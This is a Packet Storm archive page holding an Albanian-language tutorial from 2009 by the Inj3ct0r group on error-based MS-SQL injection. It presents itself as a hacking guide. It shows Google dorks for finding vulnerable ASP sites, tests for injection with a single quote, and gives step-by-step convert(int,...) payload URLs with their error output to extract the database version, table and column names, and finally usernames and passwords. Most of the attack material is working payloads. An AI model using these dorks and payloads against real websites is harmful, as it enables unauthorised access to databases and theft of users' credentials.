what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

MS-SQL Injection Tutorial

MS-SQL Injection Tutorial
Posted Sep 22, 2009
Authored by Inj3ct0r | Site Inj3ct0r.com

MS-SQL injection tutorial written in Albanian.

tags | paper, sql injection
SHA-256 | 8ef07e5e29143b5b33639b6747fb8fc4954afc7a82ec26965349ba787f70a703

MS-SQL Injection Tutorial

Change Mirror Download
==============================
MSSQL Injection Tutorial [ALB]
==============================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com


Hi.I Just Visited You WebPage & I wrote this Tutorial.It shows how you can use MSSQL-i to get to the important data.I Wrote it in ALBANIAN language,so i hope that with this i can get you more Albanian visitors (HACKERS).There are lot,but they arent famous.Hope You will publish it.And Commin soon in English.Waiting for ur Reply.:P.BEst Wishes

check out the rest of the Windows Live . More than mail Windows Live goes way beyond your inbox. http://www.microsoft.com/windows/windowslive/

***************************************************

Ne Kete Tutorial DO Ju Tregoj Se SI te Arini Deri Tek Te Dhenat e Web-it Duke Perdorur MSSQL-i Metoden.

Ne KÊtÊ Tutorial do tÊ pÊrdorim kÊtÊ lloj tÊ sulmit:
"ODBC Error Message Attack with "CONVERT"


1.Njihere Duhet Te Kerkojm Faqe Qe Jan Vulnerable.
---------------------------------------------------

Per Te GJetur Faqe qe jan Vulnerable eshte shum e lehte :P.Per Kete mund ta perdorim Google :D.

Shkojm dhe e Hapim www.google.com Dhe Kerkojm me DORKS.

Si Shembull une i mora Disa.Ju Mund TE GJeni Edhe PLot Tjera.

Shkruajm psh: inurl: "news.asp" "sub"
inurl: "games.asp" "id"
inurl: ".asp" "id" ....etj

2. Tani Duhe ta Provojm Faqen a eshte Vulnerable per MSSQL-i.
-------------------------------------------------------------

Edhe KJo Eshte ShUm e Lehte.Kjo Behet Duke Shtuar Stringun (') Pas Id=100.

Ne Rast Se Na Pergjigjet Duke Dhene Error ,atehere e Kuptojm Se Faqeja Eshte Vulnerable.DIsa Prej Pergjigjeve
me te shpeshta jane:

++++++++++++++++++++++++++++++++++++++++++++++
ODBC Microsoft Access Driver

Unclosed quotation mark

Microsoft OLE DB Provider for Oracle

Division by zero in

Microsoft OLE DB Provider for SQL Server error '80040e14'

Dhe TE Themi se Na Eshte DHene Nje Pergjigje psh:

Microsoft OLE DB Provider for SQL Server error '80040e14'

Unclosed quotation mark after the character string ') AND (Volgorde > 0) ORDER BY Volgorde'.

/msn/shared/includes/main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++

Kjo Dmth Se Faqja Eshte Vulnerable Per Atack!!!


3.Si Ta Gjejm Versionin e Data Bazes (DB)?
------------------------------------------

Nese Webi Eshte Keshte:www.localhost.com/lajmi.asp?id=100 Atehere ja Shtojm Kete Pjese Prapa
+or+1=convert(int,(@@version))--

Dhe Ne FUnd BEhet Keshtu:www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(@@version))--

Dhe Na Jep Pergjigje:

Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 (SP1) - 10.0.2531.0 (X64) Mar 29 2009 10:11:52 Copyright (c) 1988-2008 Microsoft Corporation Standard Edition (64-bit) on Windows NT 6.0 <X64> (Build 6002: Service Pack 2) (VM) ' to data type int.

/msn/shared/includes/main_rub.asp, line 4

Dmth E Gjetem Versionin! Tani SHkojm ME Shum :P

4.Si Te Gjejm Emrat E Tabelave apo (table_name)
------------------------------------------------

Per Te GJetur tabelat e ndonje webi nepermjet kesaj metode Shkruajme:

psh: www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables))--

Dhe DO Na Shfaqet nje Error psh:
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'Users' to data type int.

/msn/shared/includes/main_rub.asp, line 4

Dmth E Gjetem tabelen e pare.tabela e pare eshte "Users",tani per te gjetur tabelen e radhes:

psh:

www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users')))--

DHe Perseri do na shfaqet nji error i njejt dhe no na jep tabelen e dyte:

psh:

Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'lajmet' to data type int.

/msn/shared/includes/main_rub.asp, line 4

Dmth Tabela e dyte eshte 'lajmet'..Dhe KEshtu Vazhdojm me radhe per Tabela Tjera

5.Si Te Zbulojm column_names (emrat e kulumnave) .
--------------------------------------------------

-Nese Duam Qe te zbulojme column_name per tabelen "Users" Pasi ketuh me se shpeshti jan userat dhe passwordat shkojme:

www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Users'))--

Dhe duhet te na nxjer nje error si ky:

Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'username' to data type int.

/msn/shared/includes/main_rub.asp, line 4

Pra Emri i Kolumnes se pare per tabelen "Users" eshte "username"

Tani duhet ta gjemjm kolumnen e dyte per tabelen e njejt:

www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Users' and column_name not in ('username')))--

Dhe Na Nxjer Pergjigje (Error)

Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'password' to data type int.

/msn/shared/includes/main_rub.asp, line 4

Domethene e gjetem edhe Emrin e Kolumnes se dyte.column_name eshte "password",Tani nese duam mund te vazhdojm te gjejm

column_names e radhes por kto jan 2 gjerat ma me rendesi per HACK!! :D

6.Si ti marim te dhenat qe na Interesojn psh (Username,Password,etj) :P
-------------------------------------------------------------------------

NÊ kÊtÊ pjesÊ e tÊra qÊ duhet bÊrÊ ÊshtÊ tÊ zevenÊsojmÊ tabelen(table_name) dhe emrat e kolumnave(column_name) nÊpÊr vendet e tyre qÊ mÊ parÊ i kemi gjetur.

ShkojmÊ tani ti zÊvendÊsojmÊ psh:

www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 username from Users))--

Dhe na Nxjer Pergjigje:
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'Admin' to data type int.

/msn/shared/includes/main_rub.asp, line 4

Domethene se username eshte :Admin

ZÊvendÊsojmÊ tani kolumnÊn e parÊ "username" me kolumnÊn e dytÊ "password":

psh:

www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 password from Users))--

Dhe Na Nxjerr:

Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value '123456' to data type int.

/msn/shared/includes/main_rub.asp, line 4

Domethene Passwordi Eshte: 123456

Dhe Njejt VAzhdojm per te dhenat tjera.

Ja pra kemi arritur tÊ marrim disa nga info-tÊ, si username/pass dhe e njÊ faqe.

username: Admin
password: 123456


Besoj Se DO JU Ndihmoj Sado Pak..

Hackim Te Kendshem


*******************************************
Tuto by:**RoAd_KiLlEr**
*******************************************
Greetz to:Ton!WidnowS,Alboz-Crew,Inj3ct0r
*******************************************
WwW.inj3ct0r.com
*******************************************

----------------------------------------------

ThE End =] Visit my proj3ct :

http://inj3ct0r.com
http://inj3ct0r.org
http://inj3ct0r.net


# ~ - [ [ : Inj3ct0r : ] ]
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close